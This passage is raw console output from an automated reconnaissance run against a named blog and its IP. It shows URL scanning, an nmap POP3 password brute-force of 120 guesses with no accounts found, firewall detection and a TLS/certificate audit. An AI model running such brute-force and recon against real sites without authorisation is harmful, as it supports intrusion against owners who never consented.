3022. |_[ + ] Target:: [ http://thegarageblog.co.uk/2016/01/28/an-enlightening-case-of-how-a-correct-diagnosis-can-save-a-fortune/ ]
3023. |_[ + ] Exploit::
3024. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
3025. |_[ + ] More details:: / - / , ISP:
3026. |_[ + ] Found:: UNIDENTIFIED
3027.  
3028. _[ - ]::--------------------------------------------------------------------------------------------------------------
3029. |_[ + ] [ 89 / 100 ]-[11:56:46] [ - ]
3030. |_[ + ] Target:: [ http://thegarageblog.co.uk/2012/02/28/choosing-a-reliable-car-you-can-trust-guest-article-from-epiphany-solutions/ ]
3031. |_[ + ] Exploit::
3032. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
3033. |_[ + ] More details:: / - / , ISP:
3034. |_[ + ] Found:: UNIDENTIFIED
3035.  
3036. _[ - ]::--------------------------------------------------------------------------------------------------------------
3037. |_[ + ] [ 90 / 100 ]-[11:56:47] [ - ]
3038. |_[ + ] Target:: [ http://thegarageblog.co.uk/2010/02/16/when-technology-leaves-me-cold-are-cars-becoming-too-complicated-to-enjoy/ ]
3039. |_[ + ] Exploit::
3040. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
3041. |_[ + ] More details:: / - / , ISP:
3042. |_[ + ] Found:: UNIDENTIFIED
3043.  
3044. _[ - ]::--------------------------------------------------------------------------------------------------------------
3045. |_[ + ] [ 91 / 100 ]-[11:56:49] [ - ]
3046. |_[ + ] Target:: [ http://thegarageblog.co.uk/2010/09/30/a-bad-design-from-the-manufacturer-but-youre-left-paying-the-price/ ]
3047. |_[ + ] Exploit::
3048. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
3049. |_[ + ] More details:: / - / , ISP:
3050. |_[ + ] Found:: UNIDENTIFIED
3051.  
3052. _[ - ]::--------------------------------------------------------------------------------------------------------------
3053. |_[ + ] [ 92 / 100 ]-[11:56:50] [ - ]
3054. |_[ + ] Target:: [ http://thegarageblog.co.uk/2014/01/12/its-ok-ive-got-a-warranty-words-you-should-never-rely-on/ ]
3055. |_[ + ] Exploit::
3056. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
3057. |_[ + ] More details:: / - / , ISP:
3058. |_[ + ] Found:: UNIDENTIFIED
3059.  
3060. _[ - ]::--------------------------------------------------------------------------------------------------------------
3061. |_[ + ] [ 93 / 100 ]-[11:56:52] [ - ]
3062. |_[ + ] Target:: [ http://thegarageblog.co.uk/2014/06/26/nocturnal-arrivals-at-the-workshop-cars-that-go-wrong-in-the-night/ ]
3063. |_[ + ] Exploit::
3064. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
3065. |_[ + ] More details:: / - / , ISP:
3066. |_[ + ] Found:: UNIDENTIFIED
3067.  
3068. _[ - ]::--------------------------------------------------------------------------------------------------------------
3069. |_[ + ] [ 94 / 100 ]-[11:56:53] [ - ]
3070. |_[ + ] Target:: [ http://thegarageblog.co.uk/2010/06/24/how-broke-must-it-be-just-wake-up-and-smell-the-coffee/ ]
3071. |_[ + ] Exploit::
3072. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
3073. |_[ + ] More details:: / - / , ISP:
3074. |_[ + ] Found:: UNIDENTIFIED
3075.  
3076. _[ - ]::--------------------------------------------------------------------------------------------------------------
3077. |_[ + ] [ 95 / 100 ]-[11:56:55] [ - ]
3078. |_[ + ] Target:: [ http://thegarageblog.co.uk/2008/12/23/27-for-a-light-bulb-well-you-do-get-6-for-your-money/ ]
3079. |_[ + ] Exploit::
3080. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
3081. |_[ + ] More details:: / - / , ISP:
3082. |_[ + ] Found:: UNIDENTIFIED
3083.  
3084. _[ - ]::--------------------------------------------------------------------------------------------------------------
3085. |_[ + ] [ 96 / 100 ]-[11:56:56] [ - ]
3086. |_[ + ] Target:: [ http://thegarageblog.co.uk/2013/10/07/guest-post-what-are-the-tips-to-avoid-a-boring-journey-by-car/ ]
3087. |_[ + ] Exploit::
3088. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
3089. |_[ + ] More details:: / - / , ISP:
3090. |_[ + ] Found:: UNIDENTIFIED
3091.  
3092. _[ - ]::--------------------------------------------------------------------------------------------------------------
3093. |_[ + ] [ 97 / 100 ]-[11:56:57] [ - ]
3094. |_[ + ] Target:: [ http://thegarageblog.co.uk/2010/07/22/misfuelling-is-on-the-rise-dont-get-ripped-off-for-a-diesel-accident/ ]
3095. |_[ + ] Exploit::
3096. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
3097. |_[ + ] More details:: / - / , ISP:
3098. |_[ + ] Found:: UNIDENTIFIED
3099.  
3100. _[ - ]::--------------------------------------------------------------------------------------------------------------
3101. |_[ + ] [ 98 / 100 ]-[11:56:59] [ - ]
3102. |_[ + ] Target:: [ http://thegarageblog.co.uk/2009/10/22/think-of-a-price-then-double-it-the-truth-beind-garage-repair-costs/ ]
3103. |_[ + ] Exploit::
3104. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
3105. |_[ + ] More details:: / - / , ISP:
3106. |_[ + ] Found:: UNIDENTIFIED
3107.  
3108. _[ - ]::--------------------------------------------------------------------------------------------------------------
3109. |_[ + ] [ 99 / 100 ]-[11:57:00] [ - ]
3110. |_[ + ] Target:: [ http://thegarageblog.co.uk/2013/04/03/the-horsemeat-scandal-continues-why-cut-price-servicing-may-have-hidden-nasties-too/ ]
3111. |_[ + ] Exploit::
3112. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
3113. |_[ + ] More details:: / - / , ISP:
3114. |_[ + ] Found:: UNIDENTIFIED
3115.  
3116. [ INFO ] [ Shutting down ]
3117. [ INFO ] [ End of process INURLBR at [11-07-2016 11:57:00]
3118. [ INFO ] [ TOTAL FILTERED VALUES ]:: [ 0 ]
3119. [ INFO ] [ OUTPUT FILE ]:: [ /root/Sn1per/output/loot/inurlbr-thegarageblog.co.uk.txt ]
3120. |_________________________________________________________________________________________
3121.  
3122. \_________________________________________________________________________________________/
3123.  
3124. + -- --=[Port 110 opened... running tests...
3125.  
3126. Starting Nmap 7.12SVN ( https://nmap.org ) at 2016-07-11 11:57 EEST
3127. Nmap scan report for thegarageblog.co.uk (192.254.237.91)
3128. Host is up (0.23s latency).
3129. PORT STATE SERVICE VERSION
3130. 110/tcp open pop3 Dovecot pop3d
3131. | pop3-brute:
3132. | Accounts: No valid accounts found
3133. |_ Statistics: Performed 120 guesses in 184 seconds, average tps: 0
3134. |_pop3-capabilities: AUTH-RESP-CODE PIPELINING USER SASL(PLAIN LOGIN) RESP-CODES CAPA UIDL TOP STLS
3135.  
3136. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
3137. Nmap done: 1 IP address (1 host up) scanned in 185.83 seconds
3138. + -- --=[Port 111 closed... skipping.
3139. + -- --=[Port 135 closed... skipping.
3140. + -- --=[Port 139 closed... skipping.
3141. + -- --=[Port 162 closed... skipping.
3142. + -- --=[Port 389 closed... skipping.
3143. + -- --=[Port 443 opened... running tests...
3144. ################################### Checking for WAF ##############################
3145.  
3146. ^ ^
3147. _ __ _ ____ _ __ _ _ ____
3148. ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
3149. | V V // o // _/ | V V // 0 // 0 // _/
3150. |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
3151. <
3152. ...'
3153.  
3154. WAFW00F - Web Application Firewall Detection Tool
3155.  
3156. By Sandro Gauci && Wendel G. Henrique
3157.  
3158. Checking https://thegarageblog.co.uk
3159. The site https://thegarageblog.co.uk is behind a ModSecurity (OWASP CRS)
3160. Number of requests: 11
3161.  
3162. ################################### Gathering HTTP Info ###########################
3163. ./whatweb: /usr/lib/ruby/vendor_ruby/rchardet/universaldetector.rb:39: invalid multibyte escape: /[\x80-\xFF]/ (SyntaxError)
3164.  
3165. ################################### Gathering SSL/TLS Info ########################
3166. Version: 1.11.7-static
3167. OpenSSL 1.0.2i-dev xx XXX xxxx
3168.  
3169. Testing SSL server thegarageblog.co.uk on port 443
3170.  
3171. TLS Fallback SCSV:
3172. Server supports TLS Fallback SCSV
3173.  
3174. TLS renegotiation:
3175. Secure session renegotiation supported
3176.  
3177. TLS Compression:
3178. Compression disabled
3179.  
3180. Heartbleed:
3181. TLS 1.2 not vulnerable to heartbleed
3182. TLS 1.1 not vulnerable to heartbleed
3183. TLS 1.0 not vulnerable to heartbleed
3184.  
3185. Supported Server Cipher(s):
3186. Preferred TLSv1.2 256 bits ECDHE-RSA-AES256-GCM-SHA384 Curve P-256 DHE 256
3187. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-GCM-SHA256 Curve P-256 DHE 256
3188. Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA384 Curve P-256 DHE 256
3189. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA256 Curve P-256 DHE 256
3190. Accepted TLSv1.2 256 bits DHE-RSA-AES256-GCM-SHA384 DHE 2048 bits
3191. Accepted TLSv1.2 128 bits DHE-RSA-AES128-GCM-SHA256 DHE 2048 bits
3192. Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA256 DHE 2048 bits
3193. Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA256 DHE 2048 bits
3194. Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
3195. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
3196. Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
3197. Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
3198. Preferred TLSv1.1 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
3199. Accepted TLSv1.1 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
3200. Accepted TLSv1.1 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
3201. Accepted TLSv1.1 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
3202. Preferred TLSv1.0 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
3203. Accepted TLSv1.0 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
3204. Accepted TLSv1.0 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
3205. Accepted TLSv1.0 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
3206.  
3207. SSL Certificate:
3208. Signature Algorithm: sha256WithRSAEncryption
3209. RSA Key Strength: 2048
3210.  
3211. Subject: *.hostgator.com
3212. Altnames: DNS:*.hostgator.com, DNS:hostgator.com
3213. Issuer: COMODO RSA Domain Validation Secure Server CA
3214.  
3215. Not valid before: Oct 16 00:00:00 2015 GMT
3216. Not valid after: Oct 15 23:59:59 2018 GMT
3217.  
3218.  
3219.  
3220. AVAILABLE PLUGINS
3221. -----------------
3222.  
3223. PluginCertInfo
3224. PluginOpenSSLCipherSuites
3225. PluginChromeSha1Deprecation
3226. PluginHSTS
3227. PluginSessionResumption
3228. PluginHeartbleed
3229. PluginCompression
3230. PluginSessionRenegotiation
3231.  
3232.  
3233.  
3234. CHECKING HOST(S) AVAILABILITY
3235. -----------------------------
3236.  
3237. thegarageblog.co.uk:443 => 192.254.237.91:443
3238.  
3239.  
3240.  
3241. SCAN RESULTS FOR THEGARAGEBLOG.CO.UK:443 - 192.254.237.91:443
3242. -------------------------------------------------------------
3243.  
3244. * Deflate Compression:
3245. OK - Compression disabled
3246.  
3247. * Session Renegotiation:
3248. Client-initiated Renegotiations: OK - Rejected
3249. Secure Renegotiation: OK - Supported
3250.  
3251. * Certificate - Content:
3252. SHA1 Fingerprint: 9141b50cee603888dc45f4f285c1c8844fe12221
3253. Common Name: *.hostgator.com
3254. Issuer: COMODO RSA Domain Validation Secure Server CA
3255. Serial Number: 19607DA086E8A7FE72900982CFED93BF
3256. Not Before: Oct 16 00:00:00 2015 GMT
3257. Not After: Oct 15 23:59:59 2018 GMT
3258. Signature Algorithm: sha256WithRSAEncryption
3259. Public Key Algorithm: rsaEncryption
3260. Key Size: 2048 bit
3261. Exponent: 65537 (0x10001)
3262. X509v3 Subject Alternative Name: {'DNS': ['*.hostgator.com', 'hostgator.com']}
3263.  
3264. * Certificate - Trust:
3265. Hostname Validation: FAILED - Certificate does NOT match thegarageblog.co.uk
3266. Google CA Store (09/2015): OK - Certificate is trusted
3267. Java 6 CA Store (Update 65): OK - Certificate is trusted
3268. Microsoft CA Store (09/2015): OK - Certificate is trusted
3269. Apple CA Store (OS X 10.10.5): OK - Certificate is trusted
3270. Mozilla NSS CA Store (09/2015): OK - Certificate is trusted
3271. Certificate Chain Received: ['*.hostgator.com', 'COMODO RSA Domain Validation Secure Server CA', 'COMODO RSA Certification Authority']
3272.  
3273. * Certificate - OCSP Stapling:
3274. NOT SUPPORTED - Server did not send back an OCSP response.
3275.  
3276. * Session Resumption:
3277. With Session IDs: OK - Supported (5 successful, 0 failed, 0 errors, 5 total attempts).
3278. With TLS Session Tickets: OK - Supported
3279.  
3280. * SSLV2 Cipher Suites:
3281. Server rejected all cipher suites.
3282.  
3283. * SSLV3 Cipher Suites:
3284. Undefined - An unexpected error happened:
3285. PSK-3DES-EDE-CBC-SHA error - [Errno 111] Connection refused
3286. NULL-SHA256 error - [Errno 111] Connection refused
3287. NULL-SHA error - [Errno 111] Connection refused
3288. NULL-MD5 error - [Errno 111] Connection refused
3289. EXP-RC4-MD5 error - [Errno 111] Connection refused
3290. EXP-RC2-CBC-MD5 error - [Errno 111] Connection refused
3291. EXP-EDH-RSA-DES-CBC-SHA error - [Errno 111] Connection refused
3292. EXP-EDH-DSS-DES-CBC-SHA error - [Errno 111] Connection refused
3293. EXP-DES-CBC-SHA error - [Errno 111] Connection refused
3294. EXP-ADH-RC4-MD5 error - [Errno 111] Connection refused
3295. EXP-ADH-DES-CBC-SHA error - [Errno 111] Connection refused
3296. EDH-RSA-DES-CBC3-SHA error - [Errno 111] Connection refused
3297. EDH-RSA-DES-CBC-SHA error - [Errno 111] Connection refused
3298. EDH-DSS-DES-CBC3-SHA error - [Errno 111] Connection refused
3299. EDH-DSS-DES-CBC-SHA error - [Errno 111] Connection refused
3300. ECDHE-RSA-NULL-SHA error - [Errno 111] Connection refused
3301. ECDHE-ECDSA-NULL-SHA error - [Errno 111] Connection refused
3302. ECDH-RSA-NULL-SHA error - [Errno 111] Connection refused
3303. ECDH-RSA-DES-CBC3-SHA error - [Errno 111] Connection refused
3304. ECDH-ECDSA-NULL-SHA error - [Errno 111] Connection refused
3305. ECDH-ECDSA-DES-CBC3-SHA error - [Errno 111] Connection refused
3306. DH-RSA-DES-CBC3-SHA error - [Errno 111] Connection refused
3307. DH-RSA-DES-CBC-SHA error - [Errno 111] Connection refused
3308. DH-DSS-DES-CBC3-SHA error - [Errno 111] Connection refused
3309. DH-DSS-DES-CBC-SHA error - [Errno 111] Connection refused
3310. DES-CBC3-SHA error - [Errno 111] Connection refused
3311. DES-CBC-SHA error - [Errno 111] Connection refused
3312. AECDH-NULL-SHA error - [Errno 111] Connection refused
3313. AECDH-DES-CBC3-SHA error - [Errno 111] Connection refused
3314. ADH-DES-CBC3-SHA error - [Errno 111] Connection refused
3315. ADH-DES-CBC-SHA error - [Errno 111] Connection refused
3316.  
3317.  
3318.  
3319. SCAN COMPLETED IN 15.61 S
3320. -------------------------